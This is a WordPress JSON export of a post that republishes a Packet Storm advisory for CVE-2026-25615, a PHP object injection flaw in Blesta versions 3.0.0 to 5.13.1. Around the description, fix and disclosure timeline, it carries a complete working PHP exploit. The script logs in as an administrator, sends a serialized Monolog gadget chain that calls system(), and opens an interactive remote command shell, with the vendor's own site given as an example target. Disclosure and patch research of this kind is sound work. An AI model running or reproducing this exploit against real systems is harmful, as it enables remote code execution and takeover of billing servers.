{"id":39066,"date":"2026-02-04T11:50:04","date_gmt":"2026-02-04T11:50:04","guid":{"rendered":"http:\/\/localhost\/?p=39066"},"modified":"2026-02-04T11:50:04","modified_gmt":"2026-02-04T11:50:04","slug":"blesta-5131-admin-interface-php-object-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=39066","title":{"rendered":"\ud83d\udcc4 Blesta 5.13.1 Admin Interface PHP Object Injection_PACKETSTORM:214947"},"content":{"rendered":"

{“lastseen”:”2026-02-04T17:28:47″,”description”:”Blesta versions 3.0.0 through 5.13.1 suffer from an administrative interface PHP object injection vulnerability. The vulnerabilities exist because user input passed through the vars and orderinfo POST parameters when dispatching the…”,”published”:”2026-02-04T00:00:00″,”modified”:”2026-02-04T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Blesta 5.13.1 Admin Interface PHP Object Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:214947″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-25615″],”sourceData”:”——————————————————————————–\\n Blesta \\u003c= 5.13.1 (Admin Interface) Multiple PHP Object Injection Vulnerabilities\\n ——————————————————————————–\\n \\n \\n [-] Software Link:\\n \\n https:\/\/www.blesta.com\\n \\n \\n [-] Affected Versions:\\n \\n All versions from 3.0.0 to 5.13.1.\\n \\n \\n [-] Vulnerabilities Description:\\n \\n The vulnerabilities exist because user input passed through the \\”vars\\”\\n and \\”order_info\\” POST parameters when dispatching the\\n \/app\/controllers\/admin_clients.php script, and through the\\n \\”$group_name\\” POST parameter when dispatching the\\n \/app\/controllers\/admin_company_groups.php script, is not properly\\n sanitized before being used in a call to the unserialize() PHP\\n function. This can be exploited by malicious administrator users to\\n inject arbitrary PHP objects into the application scope, allowing them\\n to perform a variety of attacks, such as executing arbitrary PHP code\\n (RCE).\\n \\n \\n [-] Proof of Concept:\\n \\n https:\/\/karmainsecurity.com\/pocs\/CVE-2026-25615.php\\n \\n \\n [-] Solution:\\n \\n Apply the vendor patch or upgrade to version 5.13.2 or later.\\n \\n \\n [-] Disclosure Timeline:\\n \\n [19\/01\/2026] – Vendor notified\\n \\n [20\/01\/2026] – Vendor response stating: \u201cthis issue was previously\\n identified during an internal security review\u201d\\n \\n [22\/01\/2026] – CVE identifier requested\\n \\n [28\/01\/2026] – Version 5.13.2 released\\n \\n [31\/01\/2026] – Version 5.13.3 released to address regressions\\n introduced in 5.13.2\\n \\n [03\/02\/2026] – CVE identifier assigned\\n \\n [04\/02\/2026] – Public disclosure\\n \\n \\n [-] CVE Reference:\\n \\n The Common Vulnerabilities and Exposures project (cve.org) has\\n assigned the name CVE-2026-25615 to these vulnerabilities.\\n \\n \\n [-] Credits:\\n \\n Vulnerabilities discovered by Egidio Romano.\\n \\n \\n [-] Other References:\\n \\n https:\/\/www.blesta.com\/2026\/01\/28\/security-advisory\/\\n \\n \\n [-] Original Advisory:\\n \\n https:\/\/karmainsecurity.com\/KIS-2026-02\\n \\n \\n \\n — packet storm attached poc: —\\n \\n \\u003c?php\\n \\n \/*\\n ——————————————————————————–\\n Blesta \\u003c= 5.13.1 (Admin Interface) Multiple PHP Object Injection Vulnerabilities\\n ——————————————————————————–\\n \\n author…………..: Egidio Romano aka EgiX\\n mail…………….: n0b0d13s[at]gmail[dot]com\\n software link…….: https:\/\/www.blesta.com\\n \\n +————————————————————————-+\\n | This proof of concept code was written for educational purpose only. |\\n | Use it at your own risk. Author will be not responsible for any damage. |\\n +————————————————————————-+\\n \\n [-] Original Advisory:\\n \\n https:\/\/karmainsecurity.com\/KIS-2026-02\\n *\/\\n \\n set_time_limit(0);\\n error_reporting(E_ERROR);\\n \\n print \\”\\\\n+———————————————————————+\\”;\\n print \\”\\\\n| Blesta \\u003c= 5.13.1 (makepayment) PHP Object Injection Exploit by EgiX |\\”;\\n print \\”\\\\n+———————————————————————+\\\\n\\”;\\n \\n if (!extension_loaded(\\”curl\\”)) die(\\”\\\\n[-] cURL extension required!\\\\n\\\\n\\”);\\n \\n if ($argc != 4)\\n {\\n \\tprint \\”\\\\nUsage……: php $argv[0] \\u003cURL\\u003e \\u003cUsername\\u003e \\u003cPassword\\u003e\\\\n\\”;\\n \\tprint \\”\\\\nExample….: php $argv[0] http:\/\/localhost\/blesta\/ egix password\\”;\\n \\tprint \\”\\\\nExample….: php $argv[0] https:\/\/www.blesta.com\/ hacker pwned\\\\n\\\\n\\”;\\n \\tdie();\\n }\\n \\n class Monolog_Handler_SyslogUdpHandler\\n {\\n protected $socket;\\n \\n function __construct($x)\\n {\\n $this-\\u003esocket = $x;\\n }\\n }\\n \\n class Monolog_Handler_BufferHandler\\n {\\n protected $handler;\\n protected $bufferSize = -1;\\n protected $buffer;\\n protected $level = null;\\n protected $initialized = true;\\n protected $bufferLimit = -1;\\n protected $processors;\\n \\n function __construct($methods, $command)\\n {\\n $this-\\u003eprocessors = $methods;\\n $this-\\u003ebuffer = [$command];\\n $this-\\u003ehandler = $this;\\n }\\n }\\n \\n function exec_cmd($cmd)\\n {\\n \\tglobal $ch, $url, $token;\\n \\t\\n \\t$cmd .= \\”; echo CMDDELIM\\”;\\n \\t$chain = new Monolog_Handler_SyslogUdpHandler(new Monolog_Handler_BufferHandler([‘current’, ‘system’], [$cmd, ‘level’ =\\u003e null]));\\n \\t$chain = base64_encode(str_replace(‘_’, ‘\\\\\\\\’, serialize($chain)));\\n \\t\\n \\tcurl_setopt($ch, CURLOPT_URL, \\”{$url}admin\/clients\/makepayment\/1\/\\”);\\n \\tcurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([\\”_csrf_token\\” =\\u003e $token[1], \\”vars\\” =\\u003e $chain]));\\n \\t\\n \\treturn curl_exec($ch);\\n }\\n \\n $url = $argv[1];\\n $user = $argv[2];\\n $pwd = $argv[3];\\n $ch = curl_init();\\n \\n @unlink(\\”.\/cookies.txt\\”);\\n \\n curl_setopt($ch, CURLOPT_URL, \\”{$url}admin\/login\/\\”);\\n curl_setopt($ch, CURLOPT_COOKIEJAR, \\”.\/cookies.txt\\”);\\n curl_setopt($ch, CURLOPT_COOKIEFILE, \\”.\/cookies.txt\\”);\\n curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\\n curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);\\n curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);\\n \/\/curl_setopt($ch, CURLOPT_PROXY, ‘http:\/\/127.0.0.1:8080’);\\n \\n print \\”\\\\n[+] Performing login with username ‘{$user}’ and password ‘{$pwd}’\\\\n\\”;\\n \\n if (!preg_match(‘\/\\”_csrf_token\\” value=\\”([^\\”]+)\/i’, curl_exec($ch), $token)) die(\\”[-] CSRF token not found!\\\\n\\\\n\\”);\\n \\n curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([\\”_csrf_token\\” =\\u003e $token[1], \\”username\\” =\\u003e $user, \\”password\\” =\\u003e $pwd]));\\n \\n if (preg_match(‘\/alert-danger\/’, curl_exec($ch))) die(\\”[-] Login failed!\\\\n\\\\n\\”);\\n \\n print \\”[+] Launching shell\\\\n\\”;\\n \\n curl_setopt($ch, CURLOPT_URL, \\”{$url}admin\/\\”);\\n curl_setopt($ch, CURLOPT_POST, false);\\n \\n if (!preg_match(‘\/\\”_csrf_token\\” value=\\”([^\\”]+)\/i’, curl_exec($ch), $token)) die(\\”[-] CSRF token not found!\\\\n\\\\n\\”);\\n \\n while(1)\\n {\\n \\tprint \\”\\\\nblesta-shell# \\”;\\n \\tif (($cmd = trim(fgets(STDIN))) == \\”exit\\”) break;\\n \\tpreg_match(‘\/(.*)CMDDELIM\/s’, exec_cmd($cmd), $m) ? print $m[1] : die(\\”\\\\n[-] Exploit failed!\\\\n\\\\n\\”);\\n }”,”sourceHref”:”https:\/\/packetstorm.news\/download\/214947″,”cvss”:{“score”:7.2,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:H\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/214947\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-04T17:28:47″,”description”:”Blesta versions 3.0.0 through 5.13.1 suffer from an administrative interface PHP object injection vulnerability. The vulnerabilities exist because user input passed through the vars and…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,39,12,15,13,53,7,11,5],"class_list":["post-39066","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-72","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Blesta 5.13.1 Admin Interface PHP Object Injection_PACKETSTORM:214947 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=39066\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Blesta 5.13.1 Admin Interface PHP Object Injection_PACKETSTORM:214947 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-04T17:28:47″,”description”:”Blesta versions 3.0.0 through 5.13.1 suffer from an administrative interface PHP object injection vulnerability. The vulnerabilities exist because user input passed through the vars and...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=39066\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-04T11:50:04+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39066#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39066\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Blesta 5.13.1 Admin Interface PHP Object Injection_PACKETSTORM:214947\",\"datePublished\":\"2026-02-04T11:50:04+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39066\"},\"wordCount\":1036,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.2\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=39066#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39066\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39066\",\"name\":\"\ud83d\udcc4 Blesta 5.13.1 Admin Interface PHP Object Injection_PACKETSTORM:214947 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-04T11:50:04+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39066#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=39066\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39066#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Blesta 5.13.1 Admin Interface PHP Object Injection_PACKETSTORM:214947\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Blesta 5.13.1 Admin Interface PHP Object Injection_PACKETSTORM:214947 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=39066","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Blesta 5.13.1 Admin Interface PHP Object Injection_PACKETSTORM:214947 - zero redgem","og_description":"{“lastseen”:”2026-02-04T17:28:47″,”description”:”Blesta versions 3.0.0 through 5.13.1 suffer from an administrative interface PHP object injection vulnerability. The vulnerabilities exist because user input passed through the vars and...","og_url":"https:\/\/zero.redgem.net\/?p=39066","og_site_name":"zero redgem","article_published_time":"2026-02-04T11:50:04+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=39066#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=39066"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Blesta 5.13.1 Admin Interface PHP Object Injection_PACKETSTORM:214947","datePublished":"2026-02-04T11:50:04+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=39066"},"wordCount":1036,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.2","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=39066#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=39066","url":"https:\/\/zero.redgem.net\/?p=39066","name":"\ud83d\udcc4 Blesta 5.13.1 Admin Interface PHP Object Injection_PACKETSTORM:214947 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-04T11:50:04+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=39066#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=39066"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=39066#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Blesta 5.13.1 Admin Interface PHP Object Injection_PACKETSTORM:214947"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/39066","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=39066"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/39066\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=39066"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=39066"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=39066"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}